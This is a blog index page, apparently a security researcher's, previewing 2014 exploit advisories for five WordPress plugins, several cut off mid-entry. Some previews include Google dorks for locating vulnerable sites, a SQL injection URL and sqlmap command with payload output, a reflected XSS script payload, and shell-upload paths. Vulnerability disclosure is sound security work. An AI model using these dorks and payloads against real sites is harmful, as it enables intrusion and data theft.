WordPress Slider Revolution <= 4.1.4 Arbitrary File Download vulnerability

######################
# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# Software Link : Premium plugin
# Dork Google: revslider.php "index of"
# Date : 2014-07-24
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
######################
# Description
WordPress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability
######################
# PoC
http://victim/wp-admin/admin-ajax....

July 28, 2014 · 1 min · claudio

WordPress Video Gallery 2.5 SQL Injection/XSS Vulnerabilities

######################
# Exploit Title : WordPress Video Gallery 2.5 SQL Injection and XSS Vulnerabilities
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
# Software Link : http://downloads.wordpress.org/plugin/contus-video-gallery.2.5.zip
# Dork Google: inurl:/contus-video-gallery/hdflvplayer/hdplayer.swf
#              (Click on "Repeat the search with the omitted results included")
# Date : 2014-07-15
# Tested on : Windows 7 / Mozilla Firefox
#             Windows 7 / sqlmap (0.8-1)
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1....

July 24, 2014 · 2 min · claudio

WordPress Gallery Objects 0.4 SQL Injection

######################
# Exploit Title : WordPress Gallery Objects 0.4 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://galleryobjects.com/
# Software Link : http://downloads.wordpress.org/plugin/gallery-objects.0.4.zip
# Dork Google: inurl:/admin-ajax.php?action=go_view_object
# Date : 2014-07-18
# Tested on : Windows 7 / Mozilla Firefox
#             Windows 7 / sqlmap (0.8-1)
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
######################

PoC via Browser:

http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html

sqlmap:

sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid

---
Place: GET
Parameter: viewid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
---

#####################

Discovered By : Claudio Viviani
http://www....

July 18, 2014 · 1 min · claudio

WordPress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities

######################
# Exploit Title : WordPress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.tidioelements.com/
# Software Link : http://downloads.wordpress.org/plugin/tidio-gallery.zip
# Date : 2014-07-14
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location :
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php -> XSS
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-post.php -> Upload Shell
######################
# Vulnerability n°1: XSS Reflected Unauthenticated
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="/><script>alert(1);</script>
# Vulnerability n°2: Unprivileged user like subscriber could upload shell script....

July 15, 2014 · 1 min · claudio

WordPress Download Manager 2.6.8 Shell Upload Vulnerability

######################
# Exploit Title : WordPress Download Manager 2.6.8 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : www.wpdownloadmanager.com
# Software Link : http://downloads.wordpress.org/plugin/download-manager.zip
# Date : 2014-07-11
# Tested on : Linux / Mozilla Firefox / WordPress Download Manager 2.6.8 Free Version
#
#
# WORK ONLY ON SERVER WITH .HTACCESS FILES DISABLED
######################
# Location :
http://IP_VICTIM/wp-content/plugins/download-manager/wpdm-add-new-file.php
######################
# Description :
WordPress Download Manager 2....

July 11, 2014 · 1 min · claudio